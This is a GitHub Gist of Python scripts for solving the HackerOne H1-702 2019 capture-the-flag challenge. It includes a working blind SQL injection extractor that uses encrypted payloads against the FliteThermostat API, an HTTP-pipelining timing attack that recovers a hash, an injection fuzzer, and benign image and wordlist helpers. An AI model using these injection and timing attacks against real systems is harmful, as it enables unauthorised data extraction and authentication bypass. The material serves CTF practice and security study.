image_extract.py
performs character extraction on targetted against the HackerOne H1-702 CTF announcement imagedecrypt_sqli.py
performs blind sqli data extraction with encrypted payloads targetting against the FliteThermostat APItiming_attack.py
performs an HTTP piplining based timing against the FliteThermostat Backendwordlist_generator.py
generates wordlists from a give corpus or set of corpuseshttplib.py
performs efficient asynchronous HTTP requests against the FliteThermostat Backend
Last active
October 22, 2023 16:05
-
-
Save ajxchapman/b7baca094e61ff120c44379029646b97 to your computer and use it in GitHub Desktop.
Scripts developed for solving HackerOne H1-702 2019 CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
import base64 | |
import binascii | |
import json | |
import math | |
import requests | |
import sys | |
import urllib.parse | |
import zlib | |
from Crypto.Cipher import AES | |
key = [56, 79, 46, 106, 26, 5, 229, 34, 59, 128, 233, 96, 160, 166, 80, 116] | |
def decrypt(data): | |
def _unpad(s): | |
return s[:-ord(s[len(s)-1:])] | |
data = base64.b64decode(urllib.parse.unquote(data)) | |
iv = data[:16] | |
data = data[16:] | |
cipher = AES.new(bytes(key), AES.MODE_CBC, iv) | |
decdata = cipher.decrypt(data) | |
return json.loads(_unpad(decdata)) | |
def encrypt(data, iv=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf]): | |
def _pad(s): | |
return s + (16 - len(s) % 16) * chr(16 - len(s) % 16) | |
data = _pad(data if isinstance(data, str) else json.dumps(data)) | |
cipher = AES.new(bytes(key), AES.MODE_CBC, bytes(iv)) | |
return base64.b64encode(bytes(iv) + cipher.encrypt(data)).decode() | |
def post(url, data, retries=3): | |
for x in range(retries): | |
try: | |
r = requests.post(url, data=data, timeout=5) | |
return r.text | |
except: | |
pass | |
raise Exception("Cannot connect") | |
def get_int(query, bytes=1): | |
print(query) | |
bit_index = 0 | |
for bit in range(8 * bytes): | |
sys.stdout.write(".") | |
sys.stdout.flush() | |
data = { | |
"password" : "password", | |
"cmd" : "getTemp", | |
"username" : "a' or 1=CASE WHEN ({query})&{bit}={bit} THEN 1 ELSE 0 END#".format(query=query, bit=1 << bit) | |
} | |
resp = decrypt(post("http://35.243.186.41/", data={"d" : encrypt(data)})) | |
if resp["success"] == True: | |
bit_index |= 1 << bit | |
return bit_index | |
def get_string(query, length=None, charset=None, skip=0, compress=False): | |
charset = "_ABCDEFGHIJKLMNOPQRSTUVWXYZ" if charset is None else charset | |
if compress: | |
charset = "0123456789ABCDEF" | |
query = "HEX(COMPRESS(({})))".format(query) | |
if length is None: | |
length = get_int("LENGTH(({}))".format(query), bytes=2) | |
skip = skip or 8 | |
else: | |
if length is None: | |
length = get_int("LENGTH(({}))".format(query)) | |
print("Length: {}".format(length)) | |
print("Charset: {}".format(charset)) | |
output = "" | |
for index in range(skip, length): | |
bit_index = 0 | |
for bit in range(math.ceil(math.log2(len(charset)))): | |
sys.stdout.write(".") | |
sys.stdout.flush() | |
data = { | |
"password" : "password", | |
"cmd" : "getTemp", | |
"username" : "a' or 1=CASE WHEN INSTR('{charset}',SUBSTR(({query}),{index},1))-1&{bit}={bit} THEN 1 ELSE 0 END#".format(charset=charset, query=query, index=index+1, bit=1 << bit) | |
} | |
resp = decrypt(post("http://35.243.186.41/", data={"d" : encrypt(data)})) | |
if resp["success"] == True: | |
bit_index |= 1 << bit | |
if bit_index < len(charset): | |
output += charset[bit_index] | |
else: | |
output += charset[0] | |
print(index, bit_index, output) | |
if compress: | |
return zlib.decompress(binascii.unhexlify(output)).decode() | |
return output | |
def get_rows(query, index=0, charset=None): | |
output = [] | |
count = get_int("SELECT COUNT(*) FROM ({}) AS T".format(query)) | |
print("Count: {}".format(count)) | |
for x in range(index, count): | |
output.append(get_string("{} LIMIT 1 OFFSET {}".format(query, x), charset=charset)) | |
print(output[-1]) | |
return output | |
def raw_query(query, data=None): | |
data = data or { | |
"password" : "password", | |
"cmd" : "setTemp", | |
"username" : "a'; {}#".format(query), | |
"temp" : 74, | |
"device": 1 | |
} | |
return decrypt(post("http://35.243.186.41/", data={"d" : encrypt(data)})) | |
charsets = { | |
None: "0123456789ABCDEF", | |
"hex": "0123456789ABCDEF", | |
"alpha" : "ABCDEFGHIJKLMNOPQRSTUVWXYZ", | |
"alphanum" : "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", | |
"num" : "0123456789", | |
"all" : "".join(chr(x) for x in range(256)).replace("'", "''") | |
} | |
if __name__ == "__main__": | |
parser = argparse.ArgumentParser(prog="processor") | |
parser.add_argument("--compress", "-c", action="store_true") | |
parser.add_argument("--skip", "-s", type=int, default=0) | |
parser.add_argument("--type", "-t", choices=["rows", "int", "string", "raw"], default="rows") | |
parser.add_argument("--characters", type=str, default=None) | |
parser.add_argument("--charset", choices=["hex", "alpha", "num", "alphanum", "all"], default=None) | |
parser.add_argument("query", nargs='*') | |
args = parser.parse_args() | |
query = " ".join(args.query) | |
characters = args.characters or charsets[args.charset] | |
if args.type == "rows": | |
result = "\n\t".join(get_rows(query, index=args.skip, charset=characters)) | |
elif args.type == "int": | |
result = get_int(query, bytes=2) | |
elif args.type == "raw": | |
raw_query(query) | |
else: | |
result = "\n\t".join(get_string(query, skip=args.skip, charset=characters, compress=args.compress).splitlines()) | |
print("Query: {}\n\t{}".format(query, result)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import asyncio | |
import hashlib | |
import sys | |
from itertools import islice | |
import aiohttp | |
async def fetch(session, param): | |
async with session.post("http://127.0.0.1:8001/auth", data={"password" : "passpass'{}".format(param)}, headers={"Cookie" : "session=eyJsb2dnZWRJbiI6dHJ1ZX0.XHz3fg.0GiYMyEbLR9iGTVWnsfMYareK5s"}) as response: | |
body = await response.read() | |
return param, response, body | |
def tasks(session, wordlist): | |
for word in wordlist: | |
yield fetch(session, word) | |
def limited_as_completed(coros, limit=50, wait=0.001): | |
""" | |
https://www.artificialworlds.net/blog/2017/06/12/making-100-million-requests-with-python-aiohttp/ | |
""" | |
futures = [ | |
asyncio.ensure_future(c) | |
for c in islice(coros, 0, limit) | |
] | |
async def first_to_finish(): | |
while True: | |
await asyncio.sleep(wait) | |
for f in futures: | |
if f.done(): | |
futures.remove(f) | |
try: | |
newf = next(coros) | |
futures.append( | |
asyncio.ensure_future(newf)) | |
except StopIteration as e: | |
pass | |
return f.result() | |
while len(futures) > 0: | |
yield first_to_finish() | |
async def main(tasks, wordlist): | |
async with aiohttp.ClientSession() as session: | |
for res in limited_as_completed(tasks(session, wordlist), 100): | |
param, response, body = await res | |
print("{} {} {}".format(repr(param), response.status, body)) | |
if __name__ == "__main__": | |
with open(sys.argv[1], "r") as f: | |
wordlist = f.read.splitlines() | |
loop = asyncio.get_event_loop() | |
loop.run_until_complete(main(tasks, wordlist)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from PIL import Image, ImageOps, ImageDraw | |
charwidth = (4, 10) | |
charheight = 10 | |
linepadding = 8 | |
centerthreshold = 100 | |
linechars = 112 | |
def minindex(arr): | |
minindex = 0 | |
for i, x in enumerate(arr): | |
if x < arr[minindex]: | |
minindex = i | |
return minindex | |
im = Image.open(sys.argv[1]) | |
pix = im.load() | |
output = {} | |
for x in range(26): | |
xoffset = 0 | |
offset = 6 + (x * (charheight + linepadding)) | |
chars = [] | |
output[x] = [] | |
col = xoffset | |
while col < im.size[0]: | |
try: | |
charstart = col | |
charlen = minindex([sum(sum(pix[col + z, offset + y]) for y in range(charheight)) for z in range(*charwidth)]) + charwidth[0] | |
chars.append((charstart, charlen)) | |
col += charlen + 1 | |
except Exception as e: | |
chars.append((charstart, im.size[0] - charstart - 1)) | |
break | |
for i, char in enumerate(chars): | |
charstart, charlen = char | |
charend = charstart + charlen | |
# Center the character width around the character | |
while sum(sum(pix[charstart, offset + y]) for y in range(charheight)) / charheight < centerthreshold: | |
charstart += 1 | |
while sum(sum(pix[charend, offset + y]) for y in range(charheight)) / charheight < centerthreshold: | |
charend -= 1 | |
for y in range(charheight): | |
pix[charstart, offset + y] = (0, 0, 255) | |
pix[charend, offset + y] = (255, 0, 0) | |
# Mark every 8 characters with a white border (for my sanity) | |
if i % 8 == 7: | |
pix[charend, offset + y] = (255, 255, 255) | |
if charend - charstart <= 4: | |
pix[charstart, offset] = (255, 255, 0) | |
output[x].append(1) | |
else: | |
pix[charstart, offset] = (0, 255, 255) | |
output[x].append(0) | |
print("Extracted output:") | |
for x in output.keys(): | |
print("\t{:02}: {}".format(x, "".join(str(y) for y in output[x]))) | |
annotated_name = sys.argv[1].split(".") | |
annotated_name[-2] = annotated_name[-2] + "_annotated" | |
annotated_name = ".".join(annotated_name) | |
im.save(annotated_name) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import hashlib | |
import io | |
import sys | |
import socket | |
import time | |
def build_pipeline(host, duplicates=8, path="/", data=None, method=None, initial_data=None): | |
method = method or ("GET" if data is None else "POST") | |
pipeline = "" | |
request_count = duplicates + (1 if initial_data is not None else 0) | |
for x in range(request_count): | |
_data = data | |
if x == 0 and initial_data is not None: | |
_data = initial_data | |
pipeline += "{method} {path} HTTP/1.1\n".format(method=method, path=path) | |
pipeline += "Host: {host}\n".format(host=host) | |
pipeline += "Connection: {}\n".format("Close" if x == request_count - 1 else "Keep-Alive") | |
if data is not None: | |
pipeline += "Content-Length: {}\n".format(len(_data)) | |
pipeline += "Content-Type: application/x-www-form-urlencoded\n" | |
pipeline += "\n" | |
if _data is not None: | |
pipeline += _data | |
return pipeline, request_count | |
def send_request_pipeline(pipeline, response_length=734, request_count=8): | |
pipeline = pipeline.encode() | |
data = io.BytesIO() | |
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: | |
s.connect(("104.196.12.98", 80)) | |
connection_time = time.time() | |
# s.connect(("127.0.0.1", 8000)) | |
s.sendall(pipeline) | |
send_time = time.time() | |
for y in range(request_count): | |
data.write(s.recv(response_length)) | |
if y == 0: | |
afterreceive_time = time.time() | |
finish_time = time.time() | |
connection_time = finish_time - connection_time | |
send_time = finish_time - send_time | |
afterreceive_time = finish_time - afterreceive_time | |
return connection_time, send_time, afterreceive_time, recv_request_pipeline(data, request_count) | |
def recv_request_pipeline(data, response_count): | |
data.seek(0) | |
responses = [] | |
for x in range(response_count): | |
http_header = data.readline() | |
if not http_header.startswith(b'HTTP/'): | |
raise Exception("Bad HTTP header '{}'".format(http_header)) | |
status_code = int(http_header.split(b' ')[1]) | |
headers = {} | |
while True: | |
header = data.readline() | |
if header == b'\r\n': | |
break | |
header, value = header.decode().split(": ") | |
headers[header] = value | |
if not "Content-Length" in headers: | |
raise Exception("No Content-Length in headers '{}'".format(repr(headers))) | |
body = data.read(int(headers["Content-Length"])) | |
responses.append((status_code, headers, body)) | |
return responses | |
hash = sys.argv[1] if len(sys.argv) > 1 else "" | |
for index in range(int(len(hash) / 2), 32): | |
expected_fail = (0.5 * ((len(hash) / 2) + 1)) | |
early_exit_min = (0.5 * ((len(hash) / 2) + 2)) | |
early_exit_max = (0.5 * ((len(hash) / 2) + 3)) | |
print(expected_fail, early_exit_min, early_exit_max) | |
starttime = time.time() | |
print("Starting timing attack on byte {} with hash='{}'".format(index, hash)) | |
bad_count = 0 | |
inputs = list(range(256)) | |
while len(inputs) > 1: | |
results = [] | |
for hashbyte in inputs: | |
_hash = hash + ("{:02x}".format(hashbyte) * (32 - index)) | |
pipeline, request_count = build_pipeline("104.196.12.98", data="hash={}".format(_hash), duplicates=1, initial_data="hash=1") | |
result = send_request_pipeline(pipeline, response_length=739, request_count=request_count) | |
t1, t2, t3, responses = result | |
status_code, headers, body = responses[-1] | |
print("{}: {:<20} {:<20} {:<20} - {} : {}".format(_hash, t1, t2, t3, status_code, hashlib.sha256(body).hexdigest())) | |
results.append((hashbyte, *result)) | |
# Check if we should fail the last result | |
if result[2] < expected_fail: | |
bad_count += 1 | |
print("[WARNING] I think something may have gone wrong") | |
if bad_count == 5: | |
hash = hash[:-1] | |
early_exit = True | |
break | |
# Check | |
if result[2] > early_exit_min and result[2] < early_exit_max: | |
duplicates = 4 | |
pipeline, request_count = build_pipeline("104.196.12.98", data="hash={}".format(_hash), duplicates=duplicates, initial_data="hash=1") | |
result = send_request_pipeline(pipeline, response_length=739, request_count=request_count) | |
if result[2] > early_exit_min * duplicates and result[2] < early_exit_max * duplicates: | |
print("[!] Early find of result {}".format(hashbyte)) | |
print("{}: {:<20} {:<20} {:<20}".format(_hash, *result)) | |
early_exit = True | |
hash += "{:02x}".format(hashbyte) | |
break | |
if early_exit: | |
break | |
# Reduce imputs to the top quater of those that took the longest | |
inputs = [x[0] for x in sorted(results, key=lambda x: x[3])[-1 * int(len(inputs) / 4):]] | |
if early_exit: | |
continue | |
# If we get here the input won by elimination | |
hash += "{:02x}".format(inputs[0]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
import re | |
import requests | |
import inflect | |
parser = argparse.ArgumentParser(prog="processor") | |
parser.add_argument("--url", "-u", action="append", default=[]) | |
parser.add_argument("--cookie", "-c", type=str, action="append", default=[]) | |
parser.add_argument("--prefix", type=str, action="append", default=[]) | |
parser.add_argument("--prefix_file", type=str, default=None) | |
parser.add_argument("--postfix", type=str, action="append", default=[]) | |
parser.add_argument("--postfix_file", type=str, default=None) | |
parser.add_argument("--join-type", choices=["normal", "camel", "hyphon", "underscore"], default="underscore") | |
parser.add_argument("--wordlist", "-w", type=str, default=None) | |
args = parser.parse_args() | |
def join_words(*args, join_type="underscore"): | |
if join_type == "normal": | |
return "".join(args) | |
elif join_type == "camel": | |
return args[0].lower() + "".join(x.capitalize() for x in args[1:]) | |
elif join_type == "hyphon": | |
return "-".join(args) | |
return "_".join(args) | |
cookies = {} | |
for cookie in args.cookie: | |
name, value = cookie.split("=", 1) | |
cookies[name] = value | |
prefixes = args.prefix | |
if args.prefix_file is not None: | |
with open(args.prefix_file) as f: | |
prefixes.extend(f.read().splitlines()) | |
postfixes = args.postfix | |
if args.postfix_file is not None: | |
with open(args.postfix_file) as f: | |
postfixes.extend(f.read().splitlines()) | |
data = "" | |
for url in args.url: | |
r = requests.get(url, cookies=cookies) | |
data += r.text | |
wordset = set(re.findall(r'\b[A-Za-z]+\b', data)) | |
if args.wordlist is not None: | |
with open(args.wordlist) as f: | |
wordset.update(f.read().splitlines()) | |
e = inflect.engine() | |
for word in list(wordset): | |
_words = [word, word.lower(), word.capitalize(), e.plural(word), e.singular_noun(word), e.present_participle(word)] | |
for _word in [x for x in _words if isinstance(x, str)]: | |
if len(prefixes): | |
_words.extend([join_words(prefix, _word, join_type=args.type) for prefix in prefixes]) | |
if len(postfixes): | |
_words.extend([join_words(_word, postfix, join_type=args.type) for postfix in postfixes]) | |
if len(prefixes) and len(postfixes): | |
_words.extend([join_words(prefix, _word, postfix, join_type=args.type) for postfix in postfixes for prefix in prefixes]) | |
wordset.update(_words) | |
for x in sorted(x for x in wordset if isinstance(x, str)): | |
print(x) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment